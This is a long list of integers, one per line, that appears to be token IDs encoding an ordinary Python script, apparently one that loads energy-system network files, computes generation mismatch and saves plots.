43328,
7,
5647,
16,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
9347,
29765,
15987,
66,
35986,
48774,
198,
16928,
43328,
7,
5647,
17,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
9347,
29765,
15987,
66,
20514,
6682,
48774,
198,
16928,
43328,
7,
5647,
18,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
9347,
29765,
15987,
66,
20514,
4333,
48774,
628,
198,
2,
41436,
9347,
6682,
28114,
357,
28827,
66,
8,
34400,
6329,
2,
198,
2,
10644,
329,
8914,
2393,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
13912,
6682,
27484,
6852,
1,
198,
198,
2,
17267,
3127,
198,
27349,
796,
12972,
862,
64,
13,
26245,
7,
34945,
10,
7753,
8,
198,
198,
2,
11420,
15987,
66,
11420,
198,
5647,
28827,
66,
796,
9347,
15610,
4355,
44132,
414,
28925,
7,
27349,
11,
2393,
8,
198,
16928,
43328,
7,
5647,
28827,
66,
11,
3108,
11,
3670,
16193,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
15987,
66,
6682,
19174,
48774,
628,
198,
2,
41436,
12,
9347,
4217,
28114,
357,
28827,
66,
8,
41436,
438,
2,
198,
2,
10644,
284,
3613,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
13912,
4217,
6852,
1,
198,
198,
2,
17267,
3127,
198,
27349,
796,
12972,
862,
64,
13,
26245,
7,
34945,
10,
7753,
8,
198,
198,
2,
3497,
262,
3891,
286,
262,
1366,
198,
7890,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
198,
2,
3497,
640,
25560,
198,
2435,
15732,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
13,
9630,
628,
198,
2,
11420,
15987,
66,
11420,
198,
2,
42048,
3440,
329,
1123,
1499,
198,
2220,
28827,
66,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
58,
7890,
36690,
60,
198,
198,
2,
12347,
31392,
5270,
198,
20158,
38825,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
58,
7890,
36690,
1343,
366,
6591,
8973,
198,
20158,
38825,
13,
28665,
82,
796,
5270,
38825,
13,
28665,
82,
13,
2536,
13,
48369,
7,
15,
11,
17,
8,
198,
198,
2,
1550,
14640,
2344,
5270,
198,
20158,
2202,
7972,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
261,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
198,
2,
3242,
14640,
2344,
5270,
198,
2,
4362,
572,
7972,
318,
691,
329,
2310,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
2,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
572,
7972,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
20158,
9362,
7972,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
20158,
9362,
7972,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
2364,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
20158,
9362,
7972,
796,
5270,
9362,
7972,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
198,
2,
5564,
49,
10439,
198,
2,
4362,
5564,
49,
318,
691,
329,
2681,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
2,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
5564,
49,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
20158,
15450,
49,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
20158,
15450,
49,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
1472,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
20158,
15450,
49,
796,
5270,
15450,
49,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
198,
2,
32028,
5270,
329,
8744,
198,
20158,
28827,
66,
796,
5270,
38825,
1343,
5270,
2202,
7972,
1343,
5270,
9362,
7972,
1343,
5270,
15450,
49,
198,
198,
2,
337,
1042,
963,
8744,
198,
76,
1042,
963,
28827,
66,
796,
5270,
28827,
66,
532,
3440,
28827,
66,
198,
198,
2,
4217,
32,
319,
46318,
329,
8744,
198,
68,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
76,
1042,
963,
28827,
66,
8,
198,
198,
2,
41436,
6329,
9347,
28114,
357,
28827,
66,
8,
41436,
6329,
2,
198,
2,
28114,
3975,
4217,
329,
46318,
8744,
198,
7839,
43328,
28827,
66,
796,
366,
44,
1042,
963,
329,
8744,
691,
1,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
34645,
7,
68,
9324,
53,
478,
669,
28827,
66,
11,
304,
9324,
40161,
28827,
66,
11,
1366,
36690,
11,
357,
72,
1343,
352,
4008,
2,
11,
3670,
43328,
28827,
66,
11,
3670,
8979,
5376,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
9347,
4217,
15987,
66,
337,
1042,
963,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
2,
41436,
6329,
376,
9792,
28114,
357,
28827,
66,
8,
41436,
6329,
2,
198,
2,
10644,
284,
3613,
376,
9792,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
5777,
51,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
7753,
62,
3672,
796,
366,
44132,
414,
46318,
532,
366,
1343,
2393,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
376,
9792,
43328,
7,
9328,
293,
66,
13,
51,
11,
24198,
18438,
1328,
28827,
66,
11,
4217,
62,
15285,
796,
357,
72,
10,
16,
4008,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
376,
9792,
15987,
66,
337,
1042,
963,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
198,
220,
220,
220,
220,
198,
198,
2,
41436,
7369,
282,
28114,
357,
28827,
66,
8,
41436,
12,
2,
198,
2,
10644,
284,
3613,
21819,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
18960,
282,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
7753,
62,
3672,
796,
366,
44132,
414,
46318,
532,
366,
1343,
2393,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
1622,
43328,
7,
9328,
293,
66,
11,
640,
15732,
11,
4217,
62,
15285,
16193,
72,
10,
16,
828,
4217,
62,
17287,
28,
21,
11,
67,
14415,
28,
7029,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
7369,
282,
28114,
15987,
66,
337,
1042,
963,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
198,
2,
41436,
376,
9792,
1343,
7369,
282,
28114,
357,
28827,
66,
8,
41436,
12,
2,
198,
2,
10644,
284,
3613,
21819,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
28595,
10640,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
7753,
62,
3672,
796,
366,
44132,
414,
46318,
532,
366,
1343,
2393,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
376,
9792,
6230,
43328,
7,
9328,
293,
66,
11,
640,
15732,
11,
24198,
18438,
1328,
28827,
66,
11,
4217,
62,
15285,
16193,
72,
10,
16,
828,
4217,
62,
17287,
28,
21,
11,
67,
14415,
28,
2167,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
3782,
10640,
28114,
15987,
66,
337,
1042,
963,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
198,
2,
34400,
12,
2345,
3890,
7110,
357,
28827,
66,
8,
34400,
6329,
1303,
198,
2,
10644,
284,
3613,
10156,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
4264,
3890,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
2,
2345,
3890,
198,
67,
1980,
3103,
28827,
66,
796,
2345,
3890,
7,
27349,
11,
366,
11129,
66,
4943,
198,
50033,
5216,
12609,
3103,
28827,
66,
796,
1482,
11395,
8645,
1352,
7,
27237,
34184,
28827,
66,
11,
288,
1980,
3103,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
8,
198,
198,
1640,
1312,
287,
2837,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
1482,
43328,
7,
68,
9324,
40161,
28827,
66,
11,
50033,
5216,
12609,
3103,
28827,
66,
11,
72,
10,
16,
11,
940,
11,
2385,
457,
2578,
28,
7203,
44132,
414,
2345,
3890,
532,
366,
1343,
2393,
58,
1065,
21912,
18,
46570,
67,
14415,
28,
2167,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
2345,
3890,
28114,
15987,
66,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
2,
34400,
6329,
18261,
7110,
357,
28827,
66,
8,
41436,
1303,
198,
2,
10644,
284,
3613,
10156,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
31077,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
2,
18261,
198,
67,
1980,
4965,
28827,
66,
796,
15987,
66,
31077,
7,
27349,
11,
17821,
8,
198,
50033,
5216,
12609,
4965,
28827,
66,
796,
1482,
11395,
8645,
1352,
7,
27237,
34184,
28827,
66,
11,
288,
1980,
4965,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
8,
198,
198,
1640,
1312,
287,
2837,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
1482,
43328,
7,
68,
9324,
40161,
28827,
66,
11,
50033,
5216,
12609,
4965,
28827,
66,
11,
72,
10,
16,
11,
940,
11,
2385,
457,
2578,
28,
7203,
44132,
414,
18261,
532,
366,
1343,
2393,
58,
1065,
21912,
18,
46570,
67,
14415,
28,
2167,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
18261,
28114,
15987,
66,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
198,
198,
2,
34400,
6329,
39751,
2743,
590,
7110,
357,
28827,
66,
8,
41436,
1303,
198,
2,
10644,
284,
3613,
10156,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
34,
709,
2743,
590,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
2,
39751,
2743,
590,
198,
66,
709,
46912,
28827,
66,
796,
39751,
11395,
8645,
1352,
7,
67,
1980,
3103,
28827,
66,
11,
288,
1980,
4965,
28827,
66,
837,
6407,
11,
2593,
34184,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
737,
51,
198,
198,
1640,
1312,
287,
2837,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
1482,
43328,
7,
68,
9324,
40161,
28827,
66,
11,
66,
709,
46912,
28827,
66,
11,
72,
10,
16,
11,
940,
11,
2385,
457,
2578,
28,
7203,
44132,
414,
39751,
2743,
590,
532,
366,
1343,
2393,
58,
1065,
21912,
18,
46570,
67,
14415,
28,
2167,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
39751,
2743,
590,
28114,
15987,
66,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
198,
2,
34400,
6329,
32028,
4935,
295,
7110,
357,
28827,
66,
8,
41436,
1303,
198,
2,
10644,
284,
3613,
10156,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
16775,
295,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
1640,
1312,
287,
2837,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
14336,
3103,
43328,
7,
68,
9324,
40161,
28827,
66,
11,
37456,
5216,
12609,
3103,
28827,
66,
11,
37456,
5216,
12609,
4965,
28827,
66,
11,
39849,
46912,
28827,
66,
11,
1312,
10,
16,
11,
6795,
796,
718,
8,
1303,
11,
424,
457,
2578,
28,
7203,
44132,
414,
4935,
295,
532,
366,
1343,
2393,
58,
1065,
21912,
18,
46570,
67,
14415,
28,
2167,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
4935,
295,
28114,
15987,
66,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
198,
2,
34400,
6329,
4217,
16,
290,
4217,
17,
5929,
7110,
357,
28827,
66,
8,
41436,
1303,
198,
2,
10644,
284,
3613,
10156,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
20575,
1389,
28114,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
220,
198,
5647,
796,
4217,
16,
392,
17,
43328,
353,
7,
9328,
293,
66,
11,
640,
15732,
11,
685,
16,
11,
17,
4357,
304,
9324,
40161,
28827,
66,
11,
37456,
5216,
12609,
3103,
28827,
66,
11,
37456,
5216,
12609,
4965,
28827,
66,
11,
39849,
46912,
28827,
66,
11,
47,
4177,
2981,
2625,
4480,
16775,
295,
4943,
2,
11,
2385,
457,
2578,
28,
7203,
44132,
414,
337,
1042,
963,
532,
366,
1343,
2393,
58,
1065,
21912,
18,
46570,
67,
14415,
28,
2167,
8,
198,
7839,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
32028,
28114,
15987,
66,
357,
50033,
352,
1222,
362,
8,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
198,
2,
41436,
438,
2409,
7110,
7375,
17,
32315,
220,
22369,
6329,
1303,
198,
2,
10644,
284,
3613,
2318,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
10374,
6852,
1,
198,
198,
2,
6530,
286,
2393,
357,
27238,
307,
287,
3376,
9483,
4067,
8,
198,
34345,
62,
8220,
17,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
21,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
20,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
19,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
18,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
17,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
16,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
8973,
628,
198,
2,
35748,
284,
3650,
46318,
4217,
7515,
5907,
329,
1123,
3127,
198,
5657,
46912,
8220,
17,
28827,
66,
796,
17635,
198,
198,
1640,
2393,
287,
29472,
62,
8220,
17,
25,
198,
220,
220,
220,
1303,
220,
22369,
6329,
42048,
34400,
24305,
2,
198,
220,
220,
220,
1303,
7311,
198,
220,
220,
220,
3127,
796,
12972,
862,
64,
13,
26245,
7,
34945,
1343,
2393,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
262,
3891,
286,
262,
1366,
198,
220,
220,
220,
1366,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
640,
25560,
198,
220,
220,
220,
640,
15732,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
13,
9630,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
42048,
3440,
329,
1123,
1499,
198,
220,
220,
220,
3440,
28827,
66,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
58,
7890,
36690,
60,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
12347,
31392,
5270,
198,
220,
220,
220,
5270,
38825,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
58,
7890,
36690,
1343,
366,
6591,
8973,
198,
220,
220,
220,
5270,
38825,
13,
28665,
82,
796,
5270,
38825,
13,
28665,
82,
13,
2536,
13,
48369,
7,
15,
11,
17,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
1550,
14640,
2344,
5270,
198,
220,
220,
220,
5270,
2202,
7972,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
261,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3242,
14640,
2344,
5270,
198,
220,
220,
220,
1303,
4362,
572,
7972,
318,
691,
329,
2310,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
572,
7972,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
9362,
7972,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
9362,
7972,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
2364,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
9362,
7972,
796,
5270,
9362,
7972,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
5564,
49,
10439,
198,
220,
220,
220,
1303,
4362,
5564,
49,
318,
691,
329,
2681,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
5564,
49,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
15450,
49,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
15450,
49,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
1472,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
15450,
49,
796,
5270,
15450,
49,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
32028,
5270,
329,
8744,
198,
220,
220,
220,
5270,
28827,
66,
796,
5270,
38825,
1343,
5270,
2202,
7972,
1343,
5270,
9362,
7972,
1343,
5270,
15450,
49,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
337,
1042,
963,
8744,
198,
220,
220,
220,
46318,
28827,
66,
796,
5270,
28827,
66,
532,
3440,
28827,
66,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
4217,
32,
319,
46318,
329,
8744,
198,
220,
220,
220,
304,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
76,
1042,
963,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
2034,
437,
1988,
284,
17593,
198,
220,
220,
220,
2318,
46912,
8220,
17,
28827,
66,
13,
33295,
7,
25641,
590,
18438,
1328,
28827,
66,
8,
628,
198,
1102,
2536,
6003,
796,
14631,
1821,
4,
1600,
366,
1120,
4,
1600,
366,
1899,
4,
1600,
366,
2154,
4,
1600,
366,
1795,
4,
1600,
366,
3829,
4,
1600,
366,
3865,
4,
8973,
198,
7839,
796,
13538,
1303,
1,
15057,
286,
4217,
12059,
24198,
286,
3127,
355,
257,
2163,
286,
720,
8220,
23330,
17,
92,
3,
32315,
1,
198,
87,
18242,
796,
17971,
8220,
23330,
17,
92,
3,
32315,
1,
628,
198,
2385,
457,
2578,
28827,
66,
796,
13538,
1303,
7203,
44132,
414,
337,
1042,
963,
532,
366,
1343,
2393,
58,
1065,
21912,
1415,
12962,
198,
5647,
796,
31597,
7,
5657,
46912,
8220,
17,
28827,
66,
11,
767,
11,
29472,
62,
8220,
17,
11,
17778,
11,
3670,
11,
2124,
18242,
11,
424,
457,
2578,
28827,
66,
11,
10369,
7857,
28,
1507,
11,
2336,
7857,
41888,
21,
11,
513,
4357,
299,
4033,
28,
19,
11,
275,
3524,
16193,
15,
13,
20,
12095,
15,
13,
2078,
4008,
198,
7839,
10374,
8220,
17,
28827,
66,
796,
357,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
2409,
7375,
17,
15987,
66,
337,
1042,
963,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
10374,
8220,
17,
28827,
66,
8,
628,
198,
198,
2,
34400,
438,
2409,
7110,
41653,
32315,
41436,
6329,
1303,
198,
2,
10644,
198,
2,
6978,
796,
366,
34,
14079,
14490,
14,
73,
1072,
14,
3198,
24825,
532,
317,
283,
7537,
26986,
270,
316,
14,
35,
482,
1713,
263,
14,
127,
227,
81,
7537,
26986,
270,
316,
14,
42,
392,
312,
265,
532,
7511,
36795,
72,
24172,
81,
14,
1157,
13,
12449,
7834,
14,
18254,
383,
13429,
14,
2484,
1144,
33267,
14,
14989,
942,
14,
11129,
66,
62,
8807,
14,
10374,
30487,
198,
6978,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
10374,
6852,
1,
198,
198,
2,
6530,
286,
2393,
357,
27238,
307,
287,
3376,
9483,
4067,
8,
198,
34345,
62,
7645,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
3312,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
22318,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
2,
35748,
284,
3650,
46318,
4217,
7515,
5907,
329,
1123,
3127,
198,
5657,
46912,
8291,
3411,
28827,
66,
796,
17635,
198,
1640,
2393,
287,
29472,
62,
7645,
25,
198,
220,
220,
220,
1303,
220,
22369,
6329,
42048,
34400,
24305,
2,
198,
220,
220,
220,
1303,
7311,
198,
220,
220,
220,
3127,
796,
12972,
862,
64,
13,
26245,
7,
34945,
1343,
2393,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
262,
3891,
286,
262,
1366,
198,
220,
220,
220,
1366,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
640,
25560,
198,
220,
220,
220,
640,
15732,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
13,
9630,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
42048,
3440,
329,
1123,
1499,
198,
220,
220,
220,
3440,
28827,
66,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
58,
7890,
36690,
60,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
12347,
31392,
5270,
198,
220,
220,
220,
5270,
38825,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
58,
7890,
36690,
1343,
366,
6591,
8973,
198,
220,
220,
220,
5270,
38825,
13,
28665,
82,
796,
5270,
38825,
13,
28665,
82,
13,
2536,
13,
48369,
7,
15,
11,
17,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
1550,
14640,
2344,
5270,
198,
220,
220,
220,
5270,
2202,
7972,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
261,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3242,
14640,
2344,
5270,
198,
220,
220,
220,
1303,
4362,
572,
7972,
318,
691,
329,
2310,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
